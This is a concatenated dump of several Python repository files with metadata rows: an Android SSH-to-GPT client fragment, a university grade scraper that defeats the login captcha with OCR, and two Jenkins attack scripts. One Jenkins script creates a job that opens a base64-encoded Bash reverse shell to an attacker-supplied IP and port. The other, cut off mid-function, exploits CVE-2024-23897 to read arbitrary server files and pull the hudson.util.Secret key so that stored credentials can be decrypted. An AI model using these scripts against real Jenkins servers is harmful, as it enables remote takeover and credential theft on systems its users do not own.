logcheckbox = tg.Checkbox(mainscreen,"log?",control_side,False)
logcheckbox.setlinearlayoutparams(0)
logcheckbox.setheight(tg.View.WRAP_CONTENT)
exitbutton = tg.Button(mainscreen, "exit", control_side)
exitbutton.setlinearlayoutparams(0)
exitbutton.setheight(tg.View.WRAP_CONTENT)
errorstate_text = MainPageTextObject(mainscreen,control_side,"no state",12)
logstate_text = MainPageTextObject(mainscreen,control_side,"not logging",12)
speakstate_text = MainPageTextObject(mainscreen,control_side,"not speaking",12)
for eventmanager in connection.events():
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == speak:
if (speakstate):
speakstate=False
speakstate_text.settext("speech off")
else:
speakstate=True
speakstate_text.settext("speech on")
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == logcheckbox:
if (logstate):
logstate=False
logstate_text.settext("logging off")
else:
logstate=True
logstate_text.settext("logging on")
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == configbutton:
doConfigPage(c)
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == connectbutton:
errorstate_text.settext("waiting for connection")
ssh_connection=MakeSSHConnection()
lastresponse=printthrough(ssh_connection,False)
response.settext(lastresponse)
errorstate_text.settext("connected")
# control_side.setwidth(80)
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == disconnectbutton:
try:
if ssh_connection.poll() is None: ssh_connection.terminate()
except NameError: nothing=1
errorstate_text.settext("disconnected")
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == exitbutton:
mainscreen.finish()
try:
if ssh_connection.poll() is None: ssh_connection.terminate()
except NameError: nothing=1
connection.close()
sys.exit(0)
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == requestbutton:
try:
if ssh_connection.poll() is None:
ssh_connection.stdin.write(nextcommand.gettext()+"\n")
ssh_connection.stdin.flush() # important
errorstate_text.settext("awaiting response")
lastresponse=printthrough(ssh_connection,False)
response.settext(lastresponse)
errorstate_text.settext("connected")
# Log the result
if (logstate): logresult(nextcommand.gettext(),lastresponse)
if (speakstate): voicespeak(lastresponse)
# control_side.setwidth(80)
except NameError: errorstate_text.settext("disconnected")
def printthrough(handle,debug):
# Read the source until the next command indicator is reached and return the result
response = ""
if (debug==True): print ("debug mode")
while True:
newchar = handle.stdout.read(1)
if (debug==True): print (f":{newchar}:")
response = response + newchar
if configdata["next_cmd_indicator"] in newchar:
break
if (debug==True): print ("printthrough complete")
return response
def logresult(query,response):
with open(configdata["logfile"],'a') as logf: logf.write("[query] "+query+"\n\n"+"[response] "+response+"\n\n")
logf.close()
def voicespeak(text):
speakhandle= Popen(['espeak','--stdin'],stdin=PIPE,stdout=PIPE,stderr=PIPE, encoding="UTF8")
speakhandle.communicate(text)
speakhandle.terminate()
def MakeSSHConnection():
if len(configdata["port"])<1: configdata["port"]="22"
# p= Popen([ssh_location,'-p',configdata["port"],configdata["server"]],stdin=PIPE,stdout=PIPE,stderr=PIPE, encoding="UTF8")
if len(configdata["user"])<1: p= Popen(['ssh','-p',configdata["port"],configdata["server"]],stdin=PIPE,stdout=PIPE,stderr=PIPE, encoding="UTF8")
if len(configdata["user"])>1:
descrip=configdata["user"]+"@"+configdata["server"]
p= Popen(['ssh','-p',configdata["port"],descrip],stdin=PIPE,stdout=PIPE,stderr=PIPE, encoding="UTF8")
if len(configdata["sequence"])>1:
p.stdin.write(configdata["sequence"]+"\n")
p.stdin.flush() # important
return(p)
# Start program
print ("AndroidRemoteGPT by Jonathan Germain\nAvailable at https://github.com/compilebunny/androidremoteGPT\nLicensed under version 3 of the GNU General Public License")
# Variable definitions
configfilename = '~/.androidGPT'
python_location="/data/data/com.termux/files/usr/bin/python"
ssh_location="/data/data/com.termux/fjiles/usr/bin/ssh"
print ("starting")
configdata = ReadConfigFromDisk(configfilename)
print (f"{configdata}")
print (f"About to make TermuxGUI connection")
with tg.Connection() as c:
#Load the front page of the app
lastresponse="no response"
doMainPage(c)
| 12,683 | Python | .py | 260 | 45.934615 | 197 | 0.776168 | compilebunny/androidremoteGPT | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,561 | sqlite.py | Xunop_death-knell/sqlite.py | import sqlite3
from course import Course
def create_database():
conn = sqlite3.connect('data.db')
c = conn.cursor()
# 创建 users 表
c.execute('''
CREATE TABLE IF NOT EXISTS users (
user_id TEXT PRIMARY KEY,
username TEXT,
password TEXT
year TEXT,
semester TEXT
)
''')
# 更新 courses 表,加入 user_id
c.execute('''
CREATE TABLE IF NOT EXISTS courses (
year TEXT,
semester TEXT,
course_id TEXT,
name TEXT,
type TEXT,
credit TEXT,
gpa TEXT,
normal_score TEXT,
real_score TEXT,
total_score TEXT,
user_id TEXT,
FOREIGN KEY (user_id) REFERENCES users(user_id),
PRIMARY KEY (course_id, year, semester, user_id)
)
''')
conn.commit()
conn.close()
def insert_user(user_id, username, password, year, semester):
conn = sqlite3.connect('data.db')
c = conn.cursor()
c.execute('''
INSERT INTO users (user_id, username, password, year, semester)
VALUES (?, ?, ?, ?, ?)
''', (user_id, username, password, year, semester))
conn.commit()
conn.close()
def get_user(user_id):
conn = sqlite3.connect('data.db')
c = conn.cursor()
c.execute('''
SELECT * FROM users WHERE user_id = ?
''', (user_id,))
user = c.fetchone()
conn.close()
return user
def insert_course(course: Course, user_id):
conn = sqlite3.connect('data.db')
c = conn.cursor()
if course.real_score in [None, '', 'NULL']:
course.real_score = 0
if course.normal_score in [None, '', 'NULL']:
course.normal_score = 0
c.execute('''
INSERT INTO courses (year, semester, course_id, name, type, credit, gpa, normal_score, real_score, total_score, user_id)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
''', (course.year, course.semester, course.course_id, course.name, course.type, course.credit, course.gpa, course.normal_score, course.real_score, course.total_score, user_id))
conn.commit()
conn.close()
def get_courses(user_id):
conn = sqlite3.connect('data.db')
c = conn.cursor()
c.execute('''
SELECT * FROM courses WHERE user_id = ?
''', (user_id,))
courses = c.fetchall()
conn.close()
return courses
def get_course(user_id, course_id, year, semester):
conn = sqlite3.connect('data.db')
c = conn.cursor()
c.execute('''
SELECT * FROM courses WHERE user_id = ? AND course_id = ? AND year = ? AND semester = ?
''', (user_id, course_id, year, semester))
course = c.fetchone()
conn.close()
if course is None:
return None
return Course(*course)
# update_course update course
def update_course(course: Course, user_id):
conn = sqlite3.connect('data.db')
c = conn.cursor()
if course.real_score in [None, '', 'NULL']:
course.real_score = 0
if course.normal_score in [None, '', 'NULL']:
course.normal_score = 0
c.execute('''
UPDATE courses SET real_score = ?, normal_score = ?, total_score = ? WHERE user_id = ? AND course_id = ? AND year = ? AND semester = ?
''', (course.real_score, course.normal_score, course.total_score, user_id, course.course_id, course.year, course.semester))
conn.commit()
conn.close()
def delete_course(user_id, course_id, year, semester):
conn = sqlite3.connect('data.db')
c = conn.cursor()
c.execute('''
DELETE FROM courses WHERE user_id = ? AND course_id = ? AND year = ? AND semester = ?
''', (user_id, course_id, year, semester))
conn.commit()
conn.close()
| 3,611 | Python | .py | 107 | 27.981308 | 180 | 0.613833 | Xunop/death-knell | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,562 | course.py | Xunop_death-knell/course.py | class Course:
def __init__(self, year, semester, course_id, name, type, credit, gpa, normal_score, real_score, total_score, user_id):
self.year = year
self.semester = semester
self.course_id = course_id
self.name = name
self.type = type
self.credit = credit
self.gpa = gpa
self.normal_score = normal_score
self.real_score = real_score
self.total_score = total_score
self.is_dead = self.check_if_dead(total_score)
self.user_id = user_id
@staticmethod
def check_if_dead(total_score):
"""Determine if the course result is failing based on total_score."""
if isinstance(total_score, int) and total_score < 60:
return True
elif total_score == '不及格':
return True
return False
def __str__(self):
base_info = f"{self.name} - Year: {self.year}, Semester: {self.semester}, Credit: {
self.credit}, GPA: {self.gpa}, Total Score: {self.total_score}, Failed: {self.is_dead}"
if self.normal_score not in [None, '', 'NULL']:
base_info += f", Normal Score: {self.normal_score}"
if self.real_score not in [None, '', 'NULL']:
base_info += f", Real Score: {self.real_score}"
return base_info
def to_json(self):
return {
'year': self.year,
'semester': self.semester,
'course_id': self.course_id,
'name': self.name,
'type': self.type,
'credit': self.credit,
'gpa': self.gpa,
'normal_score': self.normal_score,
'real_score': self.real_score,
'total_score': self.total_score,
'is_dead': self.is_dead
}
def __eq__(self, other):
return self.to_json() == other.to_json()
| 1,856 | Python | .py | 46 | 30.391304 | 123 | 0.561179 | Xunop/death-knell | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,563 | user.py | Xunop_death-knell/user.py | class User:
def __init__(self, user_id, username, password, year, semester):
self.user_id = user_id
self.username = username
self.password = password
self.semester = semester
self.year = year
| 236 | Python | .py | 7 | 26.428571 | 68 | 0.620087 | Xunop/death-knell | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,564 | main.py | Xunop_death-knell/main.py | #!/bin/python3
import requests
import ddddocr
import argparse
import re
import base64
import difflib
import os
from time import sleep
from PIL import Image
import io
from contextlib import redirect_stdout
from io import StringIO
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.alert import Alert
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from course import Course
from sqlite import insert_course, get_course, update_course, create_database
def parse_args():
# Parse args from command line
parser = argparse.ArgumentParser(description='A simple crawler for NJUPT')
parser.add_argument('-u', '--user', help='User ID', required=True)
parser.add_argument('-p', '--password',
help='User Password', required=True)
parser.add_argument('-n', '--name', help='User Name', required=True)
parser.add_argument(
'-y', '--year', help='Year(eg: 2023-2024)', required=True)
parser.add_argument('-s', '--semester',
help='Semester(eg: 1)', default='')
# webhook
parser.add_argument('-w', '--webhook',
help='Webhook URL', default='')
return parser.parse_args()
def parse_score(content):
try:
# base64 decode
decoded_str = base64.b64decode(
content).decode('utf-8', errors='ignore')
pattern = re.compile(r'l<([^;]+);+>>;')
matches = pattern.findall(decoded_str)
# cut the first 19 matches
matches = matches[19:]
courses = []
course_data = {}
for idx, match in enumerate(matches):
if match == ' \\':
match = 'NULL'
if match == 'o<f>':
break
match = match.strip()
# Create course fields based on the index within a cycle of 22
cycle_index = idx % 22
if cycle_index == 0:
course_data['year'] = match
elif cycle_index == 1:
course_data['semester'] = match
elif cycle_index == 2:
course_data['course_id'] = match
elif cycle_index == 3:
course_data['name'] = match
elif cycle_index == 4:
course_data['type'] = match
elif cycle_index == 6:
course_data['credit'] = match
elif cycle_index == 8:
course_data['gpa'] = match
elif cycle_index == 9:
course_data['normal_score'] = match
elif cycle_index == 11:
course_data['real_score'] = match
elif cycle_index == 13:
course_data['total_score'] = match
course_data['user_id'] = user_id
# Create a Course object and add to the list when all required data is gathered
courses.append(Course(**course_data))
return courses
except Exception as e:
print(f"An error occurred: {e}")
return []
def push_to_feishu(courses: list[Course]):
headers = {
'Content-Type': 'application/json'
}
for course in courses:
# If the course has not been updated, skip
if not check_course_update(course, user_id):
print('Course has not been updated, skipping...')
continue
requests.post(
webhook_url, headers=headers, json=course.to_json())
def store_course(course: Course, user_id: str):
if check_course_update(course, user_id):
print('Course has been updated, updating...')
update_course(course, user_id)
if not check_course_exist(course, user_id):
print('Course does not exist, inserting...')
insert_course(course, user_id)
# Check if the course has been updated, If the total score has changed, update the course
def check_course_update(course: Course, user_id: str):
# Get course info from database
stored_course = get_course(user_id, course.course_id,
course.year, course.semester)
if stored_course is None:
return True
# If the total score has changed, update the course
if stored_course.total_score != course.total_score:
return True
else:
# If the total score hasn't changed, no update is required
return False
def check_course_exist(course: Course, user_id: str):
stored_course = get_course(user_id, course.course_id,
course.year, course.semester)
if stored_course is None:
return False
return True
def get_courses(user_id, user_pwd, year, semester, webhook_url):
try:
login_url = "http://jwxt.njupt.edu.cn"
driver.get(login_url)
sleep(5)
captcha_element = driver.find_element(By.ID, "icode")
location = captcha_element.location
size = captcha_element.size
screenshot = driver.get_screenshot_as_png()
image_stream = io.BytesIO(screenshot)
image = Image.open(image_stream)
# Get the position of the captcha
left = location['x']
top = location['y']
right = left + size['width']
bottom = top + size['height']
# Get the captcha image
captcha_image = image.crop((left, top, right, bottom))
captcha = ocr.classification(captcha_image)
# print(captcha)
driver.find_element(By.NAME, "txtUserName").send_keys(
user_id)
driver.find_element(By.NAME, "TextBox2").send_keys(
user_pwd)
driver.find_element(By.NAME, "txtSecretCode").send_keys(
captcha)
driver.find_element(By.ID, "RadioButtonList1_2").send_keys(
Keys.SPACE)
driver.find_element(By.NAME, "Button1").click()
WebDriverWait(driver, 10).until(EC.alert_is_present())
alert = Alert(driver)
# print("alert:", alert.text)
# Accept the alert
alert.accept()
# Find the menu
information_query_menu = WebDriverWait(driver, 10).until(
EC.visibility_of_element_located(
(By.XPATH, "//span[contains(text(), '信息查询')]"))
)
# Move to the menu
ActionChains(driver).move_to_element(information_query_menu).perform()
score_query_link = WebDriverWait(driver, 10).until(
EC.visibility_of_element_located(
(By.XPATH, "//a[contains(@onclick, '成绩查询')]"))
)
# Need to switch to the iframe
driver.switch_to.frame("iframeautoheight")
# driver.save_screenshot('before_click.png')
score_query_link.click()
ActionChains(driver).move_by_offset(100, 100).perform()
# driver.save_screenshot('after_click.png')
print("Querying score...")
# print(driver.current_url)
# print(driver.page_source)
WebDriverWait(driver, 10).until(
EC.presence_of_element_located(
(By.ID, "ddlXN"))
)
# Select year
year_select = driver.find_element(By.NAME, "ddlXN")
# print(year_select.text)
year_select.send_keys(year)
# Select semester
semester_select = driver.find_element(By.NAME, "ddlXQ")
semester_select.send_keys(semester)
query_button = driver.find_element(By.ID, "Button1")
query_button.click()
WebDriverWait(driver, 10).until(
EC.presence_of_element_located(
(By.ID, "Datagrid1"))
)
score_table = driver.find_element(By.NAME, "__VIEWSTATE")
score_value = score_table.get_attribute("value")
# score_content = score_table.get_attribute("innerHTML")
# print(score_value)
courses = parse_score(score_value)
# for course in courses:
# print(course)
return courses
finally:
driver.quit()
### Main ###
args = parse_args()
user_name = args.name
user_id = args.user
user_pwd = args.password
year = args.year
semester = args.semester
webhook_url = args.webhook
# ignore print info
null_file = StringIO()
with redirect_stdout(null_file):
ocr = ddddocr.DdddOcr()
options = Options()
# Use headless mode
options.add_argument("--headless")
driver = webdriver.Firefox(options=options)
create_database()
courses = get_courses(user_id, user_pwd, year, semester, webhook_url)
push_to_feishu(courses)
for course in courses:
if course is not None:
store_course(course, user_id)
| 8,770 | Python | .py | 224 | 30.584821 | 95 | 0.61916 | Xunop/death-knell | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,565 | linux_revshell_cmd.py | stevenvegar_Jenkins_scripts/linux_revshell_cmd.py/linux_revshell_cmd.py | from bs4 import BeautifulSoup
import argparse
import base64
import json
import random
import re
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description='Bash reverse shell from Jenkins on a Linux-based server using batch command')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-r','--reverse', type=str, required=True, help='Required. IP to receive reverse shell')
parser.add_argument('-rp','--revport', type=str, required=True, help='Required. Port to receive reverse shell')
parser.add_argument('-u','--username', type=str, help='Jenkins username (default: anonymous)')
parser.add_argument('-p','--password', type=str, help='Jenkins password (default: '')')
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
def main():
args = parse_args()
WEB_URL = args.website if 'http' in args.website else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
LOCAL_IP = args.reverse
LOCAL_PORT = args.revport
USERNAME = args.username if args.username else "anonymous"
PASSWORD = args.password if args.password else ""
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
#Get the first JSESSIONID to perform login authentication
t = requests.get(WEBSITE + "/script", proxies=PROXIES)
#Checking connection to Jenkins server
if t.status_code == 403:
print("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
#Baking first cookies
set_cookies1 = re.search("^(.*?);", (t.headers['Set-Cookie'])).group()
jsession1 = re.search("JSESSIONID.........",set_cookies1).group()
node_cookie1 = re.search("node(.*?);",set_cookies1).group()
cookies1 = {jsession1: node_cookie1}
#JSESSIONID.de9599e1=node03166kmkfqft11st4rulza2916212.node0;
#Server information based on response headers
print ("[+] Server version: " + t.headers['Server'])
print ("[+] Jenkins version: " + t.headers['X-Jenkins'])
print ("[+] Hudson version: " + t.headers['X-Hudson'])
#Post data to send in order to login
login_data = {
"j_username": USERNAME,
"j_password": PASSWORD,
"Submit": "Sign in"}
#Send authentication request
s = requests.post(WEBSITE + "/j_acegi_security_check", cookies=cookies1, data=login_data, allow_redirects=False, proxies=PROXIES)
#Checking connection to login portal
if s.status_code == 302:
print("[>] Authentication in progress as " + USERNAME, end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins login portal. Check URL and port.")
exit()
#Baking second cookies and checking if credentials work
set_cookies2 = re.search("^(.*?);", (s.headers['Set-Cookie'])).group()
jsession2 = re.search("JSESSIONID.........",set_cookies2)
if jsession2:
jsession2 = jsession2.group()
node_cookie2 = re.search("node(.*?);",set_cookies2).group()
print ("[+] Valid credentials!!! Authentication successful!!!")
else:
print("[-] Error: Can not perform authentication, check credentials or permissions...")
exit()
cookies2 = {jsession2: node_cookie2}
#JSESSIONID.de9599e1=node0168z3renghcpo1hhfd1dq9zy47241.node0;
#Listing all current jobs
r = requests.get(WEBSITE + "/view/all/newJob", cookies=cookies2, proxies=PROXIES)
#Checking if user is able to view current jobs
if r.status_code == 200:
print("[>] Listing existing jobs and getting Jenkins-Crumb token", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not list current jobs, user does not have the necessary privileges. Check it manually.")
#Grabbing Jenkins-Crumb from response body
soup = BeautifulSoup(r.content, "html.parser")
crumb = soup.find_all('script')[19].text
jenkins_crumb = re.search("[a-f0-9]{32}",crumb).group()
#Create a random build name to avoid duplicates
build_name = "build_" + ''.join(random.choice('0123456789') for i in range(6))
#New job information and type
build_data = {
"name": build_name,
"mode": "hudson.model.FreeStyleProject",
"Jenkins-Crumb": jenkins_crumb}
#Creating a new job
q = requests.post(WEBSITE + "/view/all/createItem", data=build_data, cookies=cookies2, proxies=PROXIES)
#Checking if user is able to create new jobs
if q.status_code == 200:
print("[>] Creating a new job to spawn our reverse shell", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not create a new job, user does not have the necessary rights. Check it manually.")
#Bash reverse shell
#https://www.revshells.com/Bash%20-i?ip=<IP>&port=<PORT>&shell=/bin/bash
dec_payload = "/bin/bash -i >& /dev/tcp/" + LOCAL_IP + "/" + LOCAL_PORT + " 0>&1"
encode = str(base64.b64encode(bytes(dec_payload, "utf-8")), encoding='ascii')
reverse_shell = "echo " + encode + " | base64 -d | bash"
#Configuration of the new job to execute payload
json_config = {
"builder": {
"command": reverse_shell,
"stapler-class": "hudson.tasks.Shell",
"$class": "hudson.tasks.Shell"
},
"Jenkins-Crumb": jenkins_crumb
}
#Encoding configuration data into json format
job_data = {
"Jenkins-Crumb": jenkins_crumb,
"Submit": "Save",
"json": json.dumps(json_config)
}
#Saving job configuration with reverse shell payload
p = requests.post(WEBSITE + "/job/" + build_name + "/configSubmit", data=job_data, cookies=cookies2, proxies=PROXIES)
#Checking if the job configuration is correct
if p.status_code == 200:
print("[>] Configuring job " + build_name + " with the reverse shell payload", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not configure the new job, user does not have the necessary rights. Check it manually.")
#Necessary cookies to start the job
params = {"delay": "0sec"}
crum_head = {"Jenkins-Crumb": jenkins_crumb}
#Initializing the job to execute the reverse shell
o = requests.post(WEBSITE + "/job/" + build_name + "/build", params=params, headers=crum_head, cookies=cookies2, proxies=PROXIES)
if o.status_code == 201:
print("[>] Executing the job with the reverse shell, check your listener", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not execute the new job, user does not have the necessary rights. Check it manually.")
#Finalizing script
print ("[+] Exploit executed successfully, should receive a Bash reverse shell. Enjoy :D")
if __name__ == "__main__":
main()
| 7,310 | Python | .py | 138 | 49.456522 | 181 | 0.694639 | stevenvegar/Jenkins_scripts | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,566 | get_creds_CVE-2024-23897.py | stevenvegar_Jenkins_scripts/get_creds_CVE-2024-23897.py/get_creds_CVE-2024-23897.py | import argparse
import base64
import binascii
import re
import requests
import threading
import time
import uuid
from concurrent.futures import ThreadPoolExecutor
from Crypto.Cipher import AES
from hashlib import sha256
def parse_args():
parser = argparse.ArgumentParser(description='Decrypt global credential passwords using CVE-2024-23897 from Jenkins on Windows')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL or IP')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
return parser.parse_args()
def check_connection(WEBSITE):
#Checking connection to Jenkins server
try:
r = requests.get(WEBSITE)
print ("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
#Server information based on response headers
print ("[+] Server version: " + r.headers['Server'])
print ("[+] Jenkins version: " + r.headers['X-Jenkins'])
print ("[+] Hudson version: " + r.headers['X-Hudson'])
print (" [ ] ...")
jenkins_version = int(r.headers['X-Jenkins'][0:1] + r.headers['X-Jenkins'][2:5])
if jenkins_version >= 2442:
print ("[X] Jenkins version not vulnerable!")
print ("[X] This exploit works only in versions <= 2.441")
exit()
print ("[>] Checking anonymous authorization level...")
if r.status_code == 200:
print (" [+] Overall/Read permission found")
print (" [+] Anonymous can read ANY local files...")
return True
elif r.status_code == 403:
print (" [-] Overall/Read permission NOT found")
print (" [-] Anonymous can read only first 3 lines of ANY local files")
return False
except:
print ("[X] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
def first_request(WEBSITE, SESSION, PATH, PARAMS):
# First request is in charge to download the responses from server
headers1 = {
"Session": SESSION,
"Side": "download",
"Content-type": "application/x-www-form-urlencoded"
}
# Send first POST request
req_session = requests.Session()
t = req_session.post(WEBSITE + PATH, headers=headers1, params=PARAMS)
# Receive data from the response and keep them as hex
req_session.close()
hex_values = []
for byte in t.content:
hex_values.append(hex(byte)[2:].zfill(2))
hex_string = ''.join(hex_values)
# Tracing boundaries where the retrieved data is in the response
# ERROR: "..............." is not a valid option
if "4552524f523a2022" in hex_string and "22206973206e6f7420612076616c6964206f7074696f6e" in hex_string:
start = hex_string.index("4552524f523a2022") + 16
end = hex_string.index("22206973206e6f7420612076616c6964206f7074696f6e")
# ERROR: Too many arguments: ............... $ java
elif "4552524f523a20546f6f206d616e7920617267756d656e74733a20" in hex_string and "0d0a00000024086a617661" in hex_string:
start = hex_string.index("4552524f523a20546f6f206d616e7920617267756d656e74733a20") + 54
end = hex_string.index("0d0a00000024086a6176")
elif "4552524f523a20546f6f206d616e7920617267756d656e74733a20" in hex_string and "0a00000024086a617661" in hex_string:
start = hex_string.index("4552524f523a20546f6f206d616e7920617267756d656e74733a20") + 54
end = hex_string.index("0a00000024086a6176")
# ERROR: No such job ............... exists. Perhaps
elif "4552524f523a204e6f2073756368206a6f6220" in hex_string and "206578697374732e2050657268617073" in hex_string:
start = hex_string.index("4552524f523a204e6f2073756368206a6f6220") + 38
end = hex_string.index("206578697374732e2050657268617073")
# ERROR: No argument is allowed: ............... " java"
elif "4552524f523a204e6f20617267756d656e7420697320616c6c6f7765643a20" in hex_string and "0a00000022086a617661" in hex_string:
start = hex_string.index("4552524f523a204e6f20617267756d656e7420697320616c6c6f7765643a20") + 62
end = hex_string.index("0a00000022086a617661")
# ERROR: ............... " java"
elif "4552524f523a20" in hex_string and "0a00000022086a617661" in hex_string:
start = hex_string.index("4552524f523a20") + 14
end = hex_string.index("0a00000022086a617661")
# ERROR: No such job ............... exists.
elif "4552524f523a204e6f2073756368206a6f6220" in hex_string and "206578697374732e0" in hex_string:
start = 0
end = 0
# ERROR: Argument "..............." is required
elif "4552524f523a20417267756d656e742022" in hex_string and "222069732072657175697265640" in hex_string:
start = 0
end = 0
# ERROR: anonymous
elif "4552524f523a20616e6f6e796d6f757320" in hex_string:
start = 0
end = 0
# username and password
elif "757365726e616d65" in hex_string and "70617373776f7264" in hex_string:
start = 0
end = len(hex_string)
return hex_string[start:end]
def second_request(line, WEBSITE, SESSION, PATH, PARAMS):
# Second request es in charge to send the command to the server
print (" [ ] ...")
headers2 = {
"Session": SESSION,
"Side": "upload",
"Content-type": "application/octet-stream"
}
data = binascii.unhexlify(line)
request_obj = requests.Request('POST', WEBSITE + PATH, headers=headers2, params=PARAMS, data=data)
# Obtain prepared request and delete Content-Length
prepared_request = request_obj.prepare()
prepared_request.headers.pop("Content-Length", None)
# Send second POST request
s = requests.Session()
response = s.send(prepared_request)
s.close()
def get_installation_folder(WEBSITE, SESSION, PATH, PARAMS):
# Send requests to known paths and guess where is Jenkins installed
print("[>] Checking Jenkins installation folder")
poss_paths = {
# java -jar jenkins-cli.jar -s <JENKINS_URL> who-am-i @'C:\ProgramData\Jenkins\.jenkins\secrets\hudson.util.Secret'
"3d00003b40": r"C:\ProgramData\Jenkins\.jenkins\secrets\hudson.util.Secret",
# java -jar jenkins-cli.jar -s <JENKINS_URL> who-am-i @'C:\Program Files (x86)\Jenkins\secrets\hudson.util.Secret'
"3c00003a40": r"C:\Program Files (x86)\Jenkins\secrets\hudson.util.Secret",
# java -jar jenkins-cli.jar -s <JENKINS_URL> who-am-i @'C:\Program Files\Jenkins\secrets\hudson.util.Secret'
"3600003440": r"C:\Program Files\Jenkins\secrets\hudson.util.Secret",
# java -jar jenkins-cli.jar -s <JENKINS_URL> who-am-i @'/var/lib/jenkins/secrets/hudson.util.Secret'
"2e00002c40": r"/var/lib/jenkins/secrets/hudson.util.Secret"
}
max_retries, retry_delay, retry_count = 3, 3, 0
while retry_count < max_retries:
try:
with ThreadPoolExecutor(max_workers=2) as executor:
for key, path in poss_paths.items():
# Generate a request line for each path
line = "0000000a00000877686f2d616d2d69000000" + key + path.encode('utf-8').hex()
# Retrieve credentials file
first_request_future = executor.submit(first_request, WEBSITE, SESSION, PATH, PARAMS)
time.sleep(1)
second_request_future = executor.submit(second_request, line, WEBSITE, SESSION, PATH, PARAMS)
hex_all = first_request_future.result()
second_request_future.result()
time.sleep(1)
ascii_text = bytes.fromhex(hex_all).decode('utf-8', errors='ignore')
if "No such file" not in ascii_text:
print ("[>] Jenkins installation path found!")
ascii_path = bytes.fromhex(line[46:-54]).decode('utf-8', errors='ignore')
print (f" [>] {ascii_path}")
return key, ascii_path
break
except:
print(" [-] Requests not completed. Retrying...")
retry_count += 1
time.sleep(retry_delay)
print("[X] No Jenkins secret credentials were found...")
print("[X] Exploit not completed. Try again!")
exit()
def retrieve_hudson_secret(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER):
# This sends 3 requests to download hudson.util.Secret from server
print("[>] Downloading hudson.util.Secret binary file")
# java -jar jenkins-cli.jar -s http://<JENKINS_IP>:8080 keep-build NAME 1 @'<JENKINS_PATH>\secrets\hudson.util.Secret'
# Replace backslashes to slashes if requests are going to linux
path = r"/secrets/hudson.util.Secret" if "/var/lib/jenkins" in INS_FOLDER else r"\secrets\hudson.util.Secret"
SECRET_PATH_HEX = (INS_FOLDER + path).encode('utf-8').hex()
# List of CLI commands in hex
lines = {
"First" : "0000000c00000a6b6565702d6275696c64000000060000044e414d450000000300000131000000" + KEY + SECRET_PATH_HEX,
"Second" : "0000000c00000a6b6565702d6275696c64000000060000044e414d45000000" + KEY + SECRET_PATH_HEX,
"Third" : "0000000c00000a6b6565702d6275696c64000000" + KEY + SECRET_PATH_HEX
}
max_retries, retry_delay, retry_count = 3, 3, 0
while retry_count < max_retries:
hex_all = ""
try:
with ThreadPoolExecutor(max_workers=2) as executor:
for part, line in lines.items():
# Retrieve each part of binary file
first_request_future = executor.submit(first_request, WEBSITE, SESSION, PATH, PARAMS)
time.sleep(2)
second_request_future = executor.submit(second_request, line, WEBSITE, SESSION, PATH, PARAMS)
hex_all += first_request_future.result()
hex_all = hex_all.replace("0000000208","")
hex_all = hex_all.replace("00000001","")
hex_all += "0a" if len(hex_all) != 544 else ""
second_request_future.result()
time.sleep(2)
print(f" [+] {part} part of the binary done! {len(hex_all)} bytes")
# If binary file reaches the correct size, loop ends
if len(hex_all) == 544:
break
break
except:
print(" [-] Requests not completed. Retrying...")
retry_count += 1
time.sleep(retry_delay)
if retry_count == max_retries:
print("[X] Exploit not completed after multiple attempts... Try again!")
exit()
# Split the response and encode hex to Windows-1252, then convert to bytes
bytes_object = bytes.fromhex(hex_all)
win_encoded = bytes_object.decode('windows-1252', errors='ignore').encode('windows-1252', errors='ignore')
bin_result = win_encoded.hex()
bin_result = bin_result.replace("3f","9d",1)
bin_result = bin_result.replace("3f","8f",1)
